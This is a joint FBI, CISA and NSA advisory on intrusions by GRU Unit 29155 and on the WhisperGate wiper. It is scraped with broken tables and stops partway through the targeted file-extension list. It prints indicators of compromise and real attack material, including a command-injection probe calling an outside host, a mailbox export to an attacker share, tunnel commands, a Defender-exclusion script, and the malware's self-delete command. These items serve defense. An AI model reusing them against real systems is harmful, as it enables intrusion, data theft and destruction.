46.246.8.47 | 12/29/2023 to 01/29/2024 |
46.246.3.225 | 12/30/2023 to 02/06/2024 |
46.246.3.226 | 12/31/2023 to 02/03/2024 |
46.246.3.240 | 12/31/2023 to 02/06/2024 |
191.101.217.10 | 01/05/2024 |
102.129.153.182 | 01/08/2024 |
46.246.3.196 | 01/08/2024 |
102.129.152.60 | 01/09/2024 |
156.146.60.74 | 01/10/2024 |
191.96.227.113 | 01/10/2024 |
191.96.227.122 | 01/10/2024 |
181.214.166.132 | 01/11/2024 |
188.126.94.57 | 01/11/2024 to 01/13/2024 |
154.6.13.144 | 01/13/2024 to 01/24/2024 |
154.6.13.151 | 01/13/2024 to 01/28/2024 |
188.126.94.166 | 01/15/2024 |
89.149.38.204 | 01/18/2024 |
46.246.8.67 | 01/20/2024 |
46.246.8.53 | 01/22/2024 |
154.16.192.37 | 01/24/2024 |
191.96.150.14 | 01/24/2024 |
191.96.150.96 | 01/24/2024 |
46.246.8.10 | 01/24/2024 |
84.239.25.13 | 01/24/2024 |
154.6.13.139 | 01/26/2024 |
191.96.106.33 | 01/26/2024 |
191.96.227.159 | 01/26/2024 |
149.57.16.150 | 01/27/2024 |
191.96.150.21 | 01/27/2024 |
46.246.8.84 | 01/27/2024 |
95.181.235.8 | 01/27/2024 |
191.96.227.102 | 01/27/2024 to 01/28/2024 |
46.246.122.185 | 01/28/2024 |
146.70.102.3 | 01/29/2024 to 01/30/2024 |
46.246.3.233 | 01/30/2024 to 02/15/2024 |
46.246.3.239 | 01/30/2024 to 02/15/2024 |
188.126.89.35 | 02/03/2024 |
46.246.3.223 | 02/03/2024 |
46.246.3.245 | 02/05/2024 to 02/06/2024 |
191.96.150.50 | 02/09/2024 |
Device Type | Description |
---|---|
Samsung Galaxy A71 (SM-A715F) | Registered with MFA |
Samsung SM-G998B | Registered with MFA |
Samsung SM-M205F | Registered with MFA |
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.
]]>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. These cyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit 74455.
To mitigate this malicious cyber activity, organizations should take the following actions today:
This Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors—both during and succeeding their deployment of WhisperGate against Ukraine—as well as further analysis (see Appendix A) of the WhisperGate malware initially published in the joint advisory, Destructive Malware Targeting Organizations in Ukraine, published February 26, 2022.
FBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020:
For additional information on Russian state-sponsored malicious cyber activity and related indictments, see the recent U.S. Department of Justice (DOJ) press releases for June 26, 2024, and September 5, 2024, FBI’s Cyber Crime webpage, and CISA’s Russia Cyber Threat Overview and Advisories webpage.
Download the PDF version of this report:
For a downloadable copy of indicators of compromise (IOCs):
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
FBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage and influence operations, and assassination attempts throughout Europe. Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020. Unit 29155 cyber actors’ objectives appear to include the collection of information for espionage purposes, reputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the destruction of data [T1485].
FBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit 29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors, including known cyber-criminals and enablers to conduct their operations.
The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to Unit 29155 cyber actors. While not all encompassing, the following are the most notable threat group names related under MITRE ATT&CK G1003 and commonly used within the cybersecurity community.
Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. Government’s understanding for all activity related to these groupings.
In addition to WhisperGate and other incidents against Ukraine, Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization (NATO) in Europe and North America, as well as countries in Europe, Latin America, and Central Asia. The activity includes cyber campaigns such as website defacements, infrastructure scanning, data exfiltration, and data leak operations. These actors sell or publicly release exfiltrated victim data obtained from their compromises. Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine.
To date, the FBI has observed more than 14,000 instances of domain scanning across at least 26 NATO members and several additional European Union (EU) countries. Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim information.
Whether through offensive operations or scanning activity, Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, Central American, and Asian countries.
Unit 29155 cyber actors have been observed targeting IP ranges [T1595.001] used within multiple government and critical infrastructure organizations. The following are publicly available tools these cyber actors have used for scanning [T1595] and vulnerability exploit efforts. Unit 29155 cyber actors were not observed using these tools outside of their intended purpose. Note: Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use and/or control.
Additionally, Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration [T1572] over port 1194, and in some instances, to perform Active Directory (AD) enumeration. Adminer in combination with Impacket and ldapdomaindump were tools used for gathering information on AD. Once active devices are found, Unit 29155 cyber actors look for vulnerabilities to exploit. For example, the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind cross-site scripting, as shown in the following commands:
GET /index.php?log=to@example.com>%0d%0abcc:009247.3183-377.3183.1bf6c.19446.2@bxss.me
"GET /CMS/files/log.htm HTTP/1.1" * * "(nslookup hitccruvbrumn76c1b.bxss.me||perl -e "gethostbyname('hitccruvbrumn76c1b.bxss.me')")"
As the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines, they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure [T1588.005]. Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the following CVEs:
Analysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access [T1190], as detailed throughout this advisory:
Rather than build custom solutions, Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations. As a result, many TTPs overlap with those of other cyber actors, which can lead to misattribution.
Unit 29155 actors and their cyber-criminal affiliates commonly maintain accounts on dark web forums; this has provided the opportunity to obtain various hacker tools such as malware and malware loaders [T1588.001] like Raspberry Robin and SaintBot. While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine, the use of WhisperGate is not unique to the group. Technical analysis can be found in Appendix A: WhisperGate Malware Analysis.
Unit 29155 cyber actors are known to use VPNs to anonymize their operational activity. These cyber actors commonly attempt to exploit weaknesses in internet-facing systems, like the CVEs listed above, to initially access networks. In one instance, Unit 29155 cyber actors exploited CVE-2021-33044 and CVE-2021-33045 on Dahua IP cameras to bypass identity authentication.
Unit 29155 cyber actors have used Shodan to scan for Internet of Things (IoT) devices, using exploitation scripts to authenticate to IP cameras with default usernames and passwords [T1078.001], and exfiltrating images [T1125] (JPG files). Attempts are then made to perform remote command execution via web to vulnerable IP cameras; if successful, cyber actors would dump configuration settings and credentials in plaintext (as shown in Table 1 below) [T1552.001].
Appendix B: Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this section.
Note: These events are independent and not correlated as a single timeline of compromise.
Event | Victim Observation |
---|---|
Web requests observed from victim infrastructure |
These requests are likely intended to dump configuration settings and credentials [T1003]:
|
POST requests sent to victims with payloads [T1071.001] |
|
URL encoded values from txtUser for both commands decoded to embedded bash commands |
|
In addition, incident analysis identified the general observations listed below on victim infrastructure. Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes. Appendix B: Indicators of Compromise lists IOCs associated with the observations in Table 1 and below.
mega[.]nz
using Rclone [T1567.002].i.php
and tunnel.jsp
. In one instance, cyber actors used smbclient via ProxyChains to access internal network shares, and subsequently PSQL and MySQL clients to access internal databases.secretsdump.py
was used from the Impacket framework to obtain domain credentials, while psexec.py
was subsequently used to move laterally within a victim network. ntlmrelayx.py
via Impacket and krbrelayx.py
, which requires Impacket to function.Responder.py
.su-bruteforce
to brute force a selected user using the su
command.LinPEAS
, an open source script designed to automate the process of searching for potential privilege escalation vulnerabilities on a Linux victim.896e0f54fc67d72d94b40d7885f10c51
) for 30 days within one incident and against additional victims on various occasions. GOST is a tunneling tool designed to establish secure connections between clients and servers, allowing for secure data transmission over untrusted networks.8081
.psexec.py
from the Impacket framework. The script secretsdump.py
from the Impacket framework was used to obtain domain credentials.Since at least 2020, Unit 29155 cyber actors have used virtual private servers (VPSs) [T1583.003] to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Use of VPSs are common due to the associated IP addresses not identifying their true country of origin.
When an exploit is successfully executed on a victim system, the actors can then launch a Meterpreter payload [T1105], which commonly uses a reverse Transmission Control Protocol (TCP) connection to initiate communication with the threat actors’ infrastructure [T1095]. In one instance, an established reverse TCP session was observed from victim to actor infrastructure via the following ports:
Additional observations were collected from victim engagement and analysis, including:
mysql
, postgres
, and ssh
software and features.exp_door v1.0.2
, b374k
, WSO 4.0.5
) and the P.A.S. web shells [T1505.003], likely for initial access.Once Unit 29155 cyber actors gain access to the victims’ internal network, the victims have observed:
dns.test658324901domain.me
.java
, as detailed in the following running processes in victim incident response results:8212 - SJ 0:02.54 HISTFILE=/dev/null
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp
PWD=/tmp/.ICE-unix HOME=/ RC PID=33980 ./java –L
socks5://127.0.0.1:13338
8282 - IJ 0:03.98 HISTFILE=/dev/null
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp
PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java –L
rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://{IP Address}:7896
Script (Base64 Decoded) | Command | Purpose |
---|---|---|
usr/local/www/apache24/data/-redacted-/plugins/extension/oomla/oomla.php |
|
Creates session. |
Usr/local/www/apache24/data/-redacted-/plugins/authentication/joomla/oomla.php |
|
Allows program to run. |
Usr/local/www/apache24/data/-redacted-/plugins/privacy/contact/contact.php |
|
Allows writing to files. |
Exfiltration
In several instances, analysis identified Unit 29155 cyber actors compressing victim data [T1560] (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. These cyber actors commonly use the command-line program Rclone to exfiltrate data to a remote location from victim infrastructure.
Unit 29155 cyber actors have exfiltrated Windows processes and artifacts, such as Local Security Authority Subsystem Service (LSASS) memory dumps [T1003.001], Security Accounts Manager (SAM) files [T1003.002], and SECURITY and SYSTEM event log files [T1654]. As seen in victim incident response results, actor infrastructure has also been used to compromise multiple mail servers [T1114] and exfiltrate mail artifacts, such as email messages, using PowerShell [T1059.001] via the following command:
powershell New-MailboxExportRequest – Mailbox <resource> – FilePath `\{IP Address}sharefolder1.pst`
See Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title | ID | Use |
---|---|---|
Gather Victim Network Information: DNS | T1590.002 | Unit 29155 cyber actors have used Amass and VirusTotal to obtain information about victims’ DNS for possible use during targeting, such as subdomains for target websites. |
Active Scanning | T1595 | Unit 29155 cyber actors use publicly available tools to gather information for possible use during targeting. |
Active Scanning: Scanning IP Blocks | T1595.001 | Unit 29155 cyber actors use various open source scanning tools to scan for victim IP ranges. |
Active Scanning: Vulnerability Scanning | T1595.002 | Unit 29155 cyber actors use publicly available scanning tools to enable their discovery of IoT devices and exploitable vulnerabilities. Tools leveraged for scanning include Acunetix, Amass, Droopescan, eScan, and JoomScan. |
Search Open Technical Databases: Scan Databases | T1596.005 | Unit 29155 cyber actors use publicly available platforms like Shodan to identify internet connected hosts. |
Technique Title | ID | Use |
---|---|---|
Acquire Infrastructure: Virtual Private Server | T1583.003 | Unit 29155 cyber actors have used VPSs to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. |
Obtain Capabilities: Malware | T1588.001 | Unit 29155 cyber actors obtain publicly available malware and malware loaders to support their operations. For example, analysis suggests Raspberry Robin malware may have been used in the role of an access broker. |
Obtain Capabilities: Exploits | T1588.005 | Unit 29155 cyber actors are known to obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure. |
Technique Title | ID | Use | |
---|---|---|---|
Valid Accounts: Default Accounts | T1078.001 | Unit 29155 cyber actors use exploitation scripts to authenticate to IP cameras with default usernames and passwords. | |
Exploit Public-Facing Application | T1190 |
Unit 29155 cyber actors have used a variety of public exploits, including CVE-2021-33044, CVE-2021-33045, CVE-2022-26134, and CVE-2022-26138. The proof of concept exploit for CVE-2022-26134, Through the Wire, has also been used against a victim’s internet-facing Confluence server. |
Technique Title | ID | Use |
---|---|---|
Command and Scripting Interpreter: PowerShell | T1059.001 | Unit 29155 cyber actors have used PowerShell to execute commands and other operational tasks. |
Technique Title | ID | Use |
---|---|---|
Server Software Component: Web Shell | T1505.003 | Unit 29155 cyber actors use web shells to establish persistent access to systems. |
Technique Title | ID | Use |
---|---|---|
OS Credential Dumping: LSASS Memory | T1003.001 | Unit 29155 cyber actors have exfiltrated LSASS memory dumps to retrieve credentials from victim machines. |
OS Credential Dumping: Security Account Manager | T1003.002 | Unit 29155 cyber actors have exfiltrated usernames and hashed passwords from the SAM. |
Brute Force: Password Spraying | T1110.003 | Unit 29155 cyber actors targeted victims’ Microsoft OWA infrastructure with password spraying to obtain valid usernames and passwords. |
Unsecured Credentials: Credentials in Files | T1552.001 | Following exploitation of vulnerable IP cameras, Unit 29155 cyber actors dump configuration settings and credentials in plaintext. |
Technique Title | ID | Use |
---|---|---|
Network Service Discovery | T1046 | Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the NSE) to write custom scripts for discovering and scanning other machines. |
Log Enumeration | T1654 | Unit 29155 cyber actors have enumerated and exfiltrated SECURITY and SYSTEM logs. |
Technique Title | ID | Use |
---|---|---|
Use Alternate Authentication Material: Pass the Hash | T1550.002 | Unit 29155 cyber actors used Pass-the-Hash to authenticate via SMB. |
Technique Title | ID | Use |
---|---|---|
Email Collection | T1114 | Unit 29155 cyber actors have used their infrastructure to compromise multiple victims’ mail servers and exfiltrate mail artifacts, such as email messages. |
Video Capture | T1125 | Unit 29155 cyber actors have exploited IoT devices, specifically IP cameras with default usernames and passwords, and exfiltrated images. |
Data from Information Repositories: Confluence | T1213.001 | Unit 29155 cyber actors leveraged Through the Wire against the victim’s internet-facing Confluence server. |
Archive Collected Data | T1560 | Unit 29155 cyber actors compress victim data (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. |
Technique Title | ID | Use |
---|---|---|
Proxy: Multi-hop Proxy | T1090.003 |
Unit 29155 cyber actors executed commands via ProxyChains—a tool used to route internal traffic through a series of proxies. ProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports. |
Application Layer Protocol: Web Protocols | T1071.001 | Unit 29155 cyber actors use POST requests over HTTP to send payloads to victims. |
Application Layer Protocol: DNS | T1071.004 | Unit 29155 cyber actors used DNS tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic. |
Non-Application Layer Protocol | T1095 | Unit 29155 cyber actors commonly use a reverse TCP connection to initiate communication with their infrastructure. |
Ingress Tool Transfer | T1105 | When an exploit is successfully executed on a victim system, Unit 29155 cyber actors are known to launch the Meterpreter payload to initiate communication with their actor-controlled systems. |
Protocol Tunneling | T1572 | Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration to tunnel traffic over a single port (1194), VPNs, and GOST to anonymize their operational activity. |
Technique Title | ID | Use |
---|---|---|
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Unit 29155 cyber actors exfiltrated data to the cloud storage and file hosting service, MEGA (mega[.]nz), using Rclone. |
Technique Title | ID | Use |
---|---|---|
Data Destruction | T1485 | Unit 29155 cyber actors’ objectives include the destruction of data. |
The authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office or CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
The information in this report is being provided “as is” for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies.
September 5, 2024: Initial version.
This technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim and analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password compromising, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin America and Central Asia.
Unit 29155 cyber actors’ use of WhisperGate involved the deployment of the malware files, stage1.exe
and stage2.exe
. WhisperGate has two stages that corrupts a system’s master boot record, displays a fake ransomware note, and encrypts files based on certain file extensions (see AA22-057A). The actors used multiple Discord accounts to store malware files, including what appears to be development versions or iterations of the binaries. Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control; in this case, it was used to obtain the next step of the infection chain by directly sharing files through its platform. In the case of stage2.exe
, the binary communicated with Discord to obtain Tbopbh.jpg
—the malicious payload that is in-memory loaded and performs the destructive capabilities.[18]
The Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as Clusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following sections include notable details found within each cluster.
Cluster 1 contained the following files:
hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg
(a resource, e.g., payload, for stage2.exe)[18]saint.exe
(a downloader, SaintBot
, as detailed by CERT-UA)[19]puttyjejfrwu.exe
[19]Cluster 2 contained:
hxxps://cdn.discordapp[.]com/attachments/888408190625128461/895633952247799858/n.lashevychdirekcy.atom.gov.ua.zip
(means for sending malware in over 35 different zip files via Discord links)[20]test01.exe
from 3237.site
. Once executed, test01.exe
downloads load2022.exe
from smm2021.net
.Cluster 3 contained:
hxxps://cdn.discordapp[.]com/attachments/945968593030496269/945970446149509130/Client.exe
(Note: Unit 29155 cyber actors’ use of Client.exe
was confirmed as linked to the activity, but the file was not obtained for analysis and functionality cannot be confirmed.) asd.exe
(likely a development version of stage1.exe
)Two Windows Portable Executable (PE) files (stage1.exe
and stage2.exe
) were obtained from the Ukrainian victim for analysis. One PE file (asd.exe
) was obtained from a U.S. victim.
stage1.exe
was obtained from the C: path of the Ukrainian victim’s Windows machine. stage1.exe
executes when the infected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting normally. Table 15 lists the hashes and properties attributed to stage1.exe
.
MD5 | 5d5c99a08a7d927346ca2dafa7973fc1 |
---|---|
SHA-256 | a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 |
Compiler | MinGW(GCC: (GNU) 6.3.0)[-] |
Linker | GNU linker Id (GNU Binutils)(2.28)[GUI32] |
TimeDateStamp | 2022-01-10 05:37:18 |
Execution Message | Your hard drive has been corrupted. In case you want to recover all hard drives of your organization, You should pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65 with your organization name. We will contact you to give further instructions. |
MD5 | eac0ae655d344c25ff467a929790885c |
---|---|
SHA-256 | b9e64b58d7746cb1d3bed20405ef34d097af08c809d8dad10b9296b0bebb2b0b |
Compiler | MinGW(GCC: (GNU) 6.3.0)[-] |
Linker | GNU linker Id (GNU Binutils)(2.28)[Console32,console] |
TimeDateStamp | 1969-12-31 19:00:00 |
asd.exe
is likely a development version of stage1.exe
. While the behavior of asd.exe
is similar to stage1.exe
, the messages displayed were different.
stage2.exe
was obtained from the C: path of the Ukrainian victim’s Windows machine. Table 17 lists the hashes and properties attributed to stage2.exe
.
MD5 | 764f691b2168e8b3b6f9fb6582e2f819 |
---|---|
SHA-256 | aa79afbf82b06cda268664b7c83900d8f7a33e0f0071facba0b3d8f7a68ce56a |
Library | .NET(v4.0.30319)[-] |
Linker | Microsoft Linker(6.0)(GUI32,signed) |
TimeDateStamp | 2022-01-10 09:39:54 |
Table 18 lists the following chronological observations when stage2.exe executes.
Event | Victim Observation |
---|---|
PowerShell command executed twice | C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" –enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== |
Base64 UTF-16LE string decoded | Start-Sleep -s 10 |
HTTP GET request sent to Discord URL to download Tbopbh.jpg |
|
Nmddfrqqrbyjeygggda.vbs created and executed within the %TEMP% directory |
The Visual Basic Script (VBS) file contained the following command:
|
AdvancedRun.exe created and executed twice |
|
InstallUtil.exe created and executed; files corrupted following execution | C:Users<user>AppDataLocalTempInstallUtil.exe |
Static analysis was further conducted on two files (stage2.exe
, Tbopbh.jpg
) to uncover additional malware functionality and attributes.
Static analysis was performed on a variant of stage2.exe; its hashes and properties are listed in Table 19 below. Of note, the MD5 and SHA-256 hash values were different than those obtained from the Ukrainian victim machine (listed above in Table 17). Behavioral analysis was also performed on the below variant and both files exhibited the same behavior.
MD5 | 14c8482f302b5e81e3fa1b18a509289d |
---|---|
SHA-256 | dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 |
Library | .NET(v4.0.30319)[-] |
Linker | Microsoft Linker(6.0)(GUI32,signed) |
TimeDateStamp | 2022-01-10 09:39:54 |
This variant of stage2.exe
contained multiple layers of execution:
stage2.exe
contained a WebClient object that was initialized with Discord URL hxxps://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg
to obtain the payload Tbopbh.jpg
.stage2.exe
contained logic to reverse file bytes of a file using the Array’s Reverse method.stage2.exe
contained logic to load an Assembly object into a Stream object.stage2.exe
used the reflection library to call method Ylfwdwgmpilzyaph
from the loaded Assembly object.stage2.exe
contained decryption logic that resembled RC4, a C# class produced a base64 string and an encryption class which created a key using the decoded string. The encryption class used encryption logic every 32 bytes to decrypt. Additionally, the XOR functionality occurred using the initialized byte “Array” shown below. The encryption class resembled RC4; it was used every 32 bytes. The base64 string came from a class that contained EazFuscator logic to obfuscate code by eliminating control flow within code, as well as making symbols difficult to analyze:
byte[] array = new byte[] {148, 68, 208, 52, 241, 93, 195, 220};
stage2.exe
contained EazFuscator class logic. This included logic that built strings during runtime; otherwise, the full strings would have been obfuscated and further segmented when viewed statically. The following is an example of a built string:
UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
Start-Sleep -s 10
stage2.exe
served as the downloader and driver logic for the malware payload, Tbopbh.jpg
.An account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg:
b3370eb3c5ef6c536195b3bea0120929
923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6
When viewing payload Tbopbh.jpg
using a hex editor, it ended with value “ZM” or hex values “5A 4D”—this indicated the payload was a reversed PE. Reversing the bytes of Tbopbh.jpg
revealed the hashes of the resulting payload listed in Table 20 below.
MD5 | e61518ae9454a563b8f842286bbdb87b |
---|---|
SHA-256 | 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d |
Protector | Eazfuscator(-)[-] |
Library | .NET(v4.0.30319)[-] |
Linker | Microsoft Linker(6.0)[DLL32] |
TimeDateStamp | 2022-01-10 09:39:31 |
The original filename from the resulting payload was a Dynamic Link Library (DLL) file, Frkmlkdkdubkznbkmcf.dll
; its attributes are listed in Table 21:
Resources | Classes | Methods |
---|---|---|
u2005 u2005 u2009 u2008 u2001 u2007 u2009 u200b u200a u2005 Note: This format annotates action taken by EazFuscator to obfuscate items, making it difficult for malware analysts to review. |
Main - ClassLibrary1 | u0002 |
7c8cb5598e724d34384cce7402b11f0e | pc1eOx2WJVV1579235895 – | Ylfwdwgmpilzyaph |
78c855a088924e92a7f60d661c3d1845 |
stage2.exe
was observed calling method Ylfwdwgmpilzyaph
to begin decrypting resource 78c855a088924e92a7f60d661c3d1845
. The reflection library was used to execute method Ylfwdwgmpilzyaph
, as shown in the following C# code block:
using System.Reflection;
string path = "Frkmlkdkdubkznbkmcf.dll";
string fqpn = Path.GetFullPath(path);
Assembly assembly = Assembly.LoadFile(fqpn);
Type type = assembly.GetType("ClassLibrary1.Main");
type.InvokeMember("Ylfwdwgmpilzyaph", BindingFlags.InvokeMethod, null, null, null);
The following application configuration accompanied the above code block to allow loading from remote sources:
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<runtime>
<loadFromRemoteSources enabled="true"/>
</runtime>
</configuration>
Upon invoking the method Ylfwdwgmpilzyaph
, Nmddfrqqrbyjeygggda.vbs
wrote to the Windows %TEMP% directory and has the following attributes, as listed in Table 22 below.
MD5 | 6eed4ee0cc57126e9a096ab9905f471c |
---|---|
SHA-256 | db5a204a34969f60fe4a653f51d64eee024dbf018edea334e8b3df780eda846f |
VBS Code | CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:'", 0, False |
The VBS code listed in Table 22 used a WScript shell that executed as a Windows application, which ran a PowerShell command to exclude the C: drive from Windows Defender's security checks. Malware analysts decoded and decrypted one of the resources from Frkmlkdkdubkznbkmcf.dll
(78c855a088924e92a7f60d661c3d1845
). Further analysis of Frkmlkdkdubkznbkmcf.dll
resulted in an additional DLL file with the following hashes:
5a537673c34933fc854fbfb65477a686
35feefe6bd2b982cb1a5d4c1d094e8665c51752d0a6f7e3cae546d770c280f3a
This decrypted DLL file contained two resources, AdvancedRun
and Waqybg
.
AdvancedRun
(GZIP)
de85ca91e1e8100a619de1c25112f1a5
489ab4819830d231c3fc3572c5386cad9d18773a8121373ea8174de981cc9166
Waqybg
(GZIP)
9b1191f1ceddf312b0d609cd929c6631
0dd61a16c625c49ffefaf4ce24cabf9a074028a06640d9bbb804f735ff56dfa3
29d83f29c0b0a0b7499e71e7d5cb713f
fd4a5398e55beacb2315687a75af5aa15b776b5d36b9800a1792ede3955616c2
Table 23 and Table 24 list the file properties for both the AdvancedRun
and reversed Waqybg
decompressed files.
Type | Win32 EXE |
---|---|
Company | NirSoft |
TimeStamp | 2020:08:03 09:41:38-04:00 |
Original File Name | AdvancedRun.exe |
MD5 | 17fc12902f4769af3a9271eb4e2dacce |
SHA-256 | 29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b |
Type | Win32 EXE |
---|---|
TimeStamp | 2022:01:10 03:14:38-05:00 |
MD5 | 3907c7fbd4148395284d8e6e3c1dba5d |
SHA-256 | 34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 |
Compiler | MinGW(GCC: (GNU) 6.3.0)[-] |
Linker | GNU linker Id (GNU Binutils)(2.28)[Console32,console] |
The reversed and decompressed Waqybg
files contained file corruption logic along with a final command to ping arbitrarily and delete itself: cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q “%s”
. Waqybg
is known as WhisperKill—a malware downloaded by WhisperGate that destroys files with specific extensions.[19],[21]
The following file extensions listed in Table 25 were targeted for file corruption with the equivalent of the “wcscmp” C function logic (a string compare function). The corruption logic included overwriting 0x100000 or 1 MB worth of 0xcc values per targeted file.
u".3DM" | u".3DS" | u".602" | u".ACCDB" | u".ARC" | u".ASC" |
